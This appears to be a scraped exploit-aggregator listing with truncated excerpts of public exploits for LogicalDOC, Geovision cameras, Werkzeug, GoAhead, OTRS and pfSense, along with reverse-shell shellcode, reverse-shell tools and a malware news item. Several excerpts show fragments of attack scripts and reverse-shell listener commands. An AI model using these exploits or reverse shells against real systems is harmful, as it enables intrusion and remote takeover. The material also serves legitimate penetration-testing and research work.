ACL Analytics 11.X - 13.0.0.579 - Arbitrary Code Execution

Exploit Title: Arbitrary Code Execution Google Dork: N/A Date: 03-07-2018 Exploit Author: Clutchisback1 Vendor Homepage: https://www.acl.com Software Link: https://www.acl.com/products/acl-analytics/ Version: 11.x - 13.0.0.579 Tested on: Windows 7 pro SP1 x86 Clutchisback1 ///\ I'll get OSCP one...

LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution Vulnerability

Exploit for java platform in category web applications LogicalDOC Enterprise 7.7.4 Post-Auth Command Execution Via Binary Path Manipulation Vendor: LogicalDOC Srl Product web page: https://www.logicaldoc.com Affected version: 7.7.4 7.7.3 7.7.2 7.7.1 7.6.4 7.6.2 7.5.1 7.4.2 7.1.1 Summary: LogicalD...

LogicalDOC Enterprise 7.7.4 Post-Auth Command Execution

LogicalDOC Enterprise 7.7.4 Post-Auth Command Execution Via Binary Path Manipulation Vendor: LogicalDOC Srl Product web page: https://www.logicaldoc.com Affected version: 7.7.4 7.7.3 7.7.2 7.7.1 7.6.4 7.6.2 7.5.1 7.4.2 7.1.1 Summary: LogicalDOC is a free document management system that is designe...

LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution

LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution LogicalDOC Enterprise 7.7.4 Post-Auth Command Execution Via Binary Path Manipulation Vendor: LogicalDOC Srl Product web page: https://www.logicaldoc.com Affected version: 7.7.4 7.7.3 7.7.2 7.7.1 7.6.4 7.6.2 7.5.1 7.4.2 7.1.1 Summary:...

One-Liners That Aids in Penetration Testing Operations: One-Lin3r

One-Lin3r is simple and light-weight framework inspired by the web-delivery module in Metasploit. It consists of various one-liners that aids in penetration testing operations: Reverser : Give it IP & port and it returns a reverse shell liner ready for copy & paste. Dropper : Give it an...

Geovision Inc. IP Camera Video - Remote Command Execution

Geovision Inc. IP Camera Video - Remote Command Execution !/usr/bin/env python2.7 SOF Geovision Inc. IP Camera & Video Server Remote Command Execution PoC Researcher: bashis November 2017 1. Pop stunnel TLSv1 reverse root shell Local listener: 'ncat -vlp --ssl'; Verified w/ v7.60 2. Dump all...

Geovision Inc. IP Camera & Video - Remote Command Execution

!/usr/bin/env python2.7 SOF Geovision Inc. IP Camera & Video Server Remote Command Execution PoC Researcher: bashis November 2017 1. Pop stunnel TLSv1 reverse root shell Local listener: 'ncat -vlp --ssl'; Verified w/ v7.60 2. Dump all settings of remote IPC with Login/Passwd in cleartext Using: -...

Werkzeug - Debug Shell Command Execution

Werkzeug - Debug Shell Command Execution !/usr/bin/env python import requests import sys import re import urllib usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if lensys.argv != 5: print "USAGE: python %s " % sys.argv0 sys.exit-1 response = requests.get'http://%s:%s/console' %...

Werkzeug - 'Debug Shell' Command Execution

!/usr/bin/env python import requests import sys import re import urllib usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if lensys.argv != 5: print "USAGE: python %s " % sys.argv0 sys.exit-1 response = requests.get'http://%s:%s/console' % sys.argv1,sys.argv2 if "Werkzeug " not in...

GoAhead Web Server 2.5 < 3.6.5 - HTTPd LD_PRELOAD Arbitrary Module Load Exploit

This Metasploit module triggers an arbitrary shared library load vulnerability in GoAhead web server versions between 2.5 and that have the CGI module enabled. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...

GoAhead Web Server LD_PRELOAD Arbitrary Module Load

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'GoAhead Web Server LDPRELOAD Arbitrary Module Load', 'Description' = %q This module triggers an arbitrary shared library load vulnerability in...

GoAhead Web Server 2.5 &lt; 3.6.5 - HTTPd &#039;LD_PRELOAD&#039; Arbitrary Module Load (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'GoAhead Web Server LDPRELOAD Arbitrary Module Load', 'Description' = %q This module triggers an arbitrary shared library load vulnerability in...

Unix Command Shell, Reverse UDP (via socat)

Creates an interactive shell via socat This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 87 include Msf::Payload::Single include Msf::Sessions::CommandShellOptions def initializeinfo...

OTRS 5.0.x6.0.x - Remote Command Execution

OTRS 5.0.x6.0.x - Remote Command Execution Exploit Title: OTRS Shell Access Date: 21-01-2018 Exploit Author: Bæln0rn Vendor Homepage: https://www.otrs.com/ Software Link: http://ftp.otrs.org/pub/otrs/ Version: 4.0.1 - 4.0.26, 5.0.0 - 5.0.24, 6.0.0 - 6.0.1 Tested on: OTRS 5.0.2/CentOS 7.2.1511 CVE...

Hershell - Simple TCP reverse shell written in Go

Simple TCP reverse shell written in Go . It uses TLS to secure the communications, and provide a certificate public key fingerprint pinning feature, preventing from traffic interception. Supported OS are: Windows Linux Mac OS FreeBSD and derivatives Why ? Although meterpreter payloads are great,...

Potent Skygofree Malware Packs ‘Never-Before-Seen’ Features

Researchers have identified a powerful new Android malware strain called Skygofree capable of eavesdropping on WhatsApp messages, siphoning private data off phones and allowing adversaries to open reverse shell modules on targeted devices, giving attackers ultimate remote control. Researchers sai...

Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes)

Linux/ARM - Reverse TCP 192.168.1.1:4444/TCP Shell /bin/sh + Password MyPasswd + Null-Free Shellcode 156 bytes. Shellcode exploit for ARM platform / Title: Linux/ARM - Password Protected Reverse Shell TCP /bin/sh. Null free shellcode 156 bytes Date: 2018-01-15 Tested: armv7l Raspberry Pi v3 Autho...

pfSense 2.1.3 status_rrd_graph_img.php Command Injection

!/usr/bin/env python3 Exploit Title: pfSense = 2.1.3 statusrrdgraphimg.php Command Injection. Date: 2018-01-12 Exploit Author: absolomb Vendor Homepage: https://www.pfsense.org/ Software Link: https://atxfiles.pfsense.org/mirror/downloads/old/ Version: =2.1.3 Tested on: FreeBSD 8.3-RELEASE-p16 CV...

Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 byt

; =================================================================== ; Password Protected Reverse Shell ; Author: SLAE64-1351 Keyman ; Date: 04/09/2014 ; ; Shellcode length: 136 bytes ; ; Description: ; ; Simple reverse shell listens on port 4444 by default with ; bytes password protection. Usin...

pfSense &lt; 2.1.4 - &#039;status_rrd_graph_img.php&#039; Command Injection

!/usr/bin/env python3 Exploit Title: pfSense = 2.1.3 statusrrdgraphimg.php Command Injection. Date: 2018-01-12 Exploit Author: absolomb Vendor Homepage: https://www.pfsense.org/ Software Link: https://atxfiles.pfsense.org/mirror/downloads/old/ Version: =2.1.3 Tested on: FreeBSD 8.3-RELEASE-p16 CV...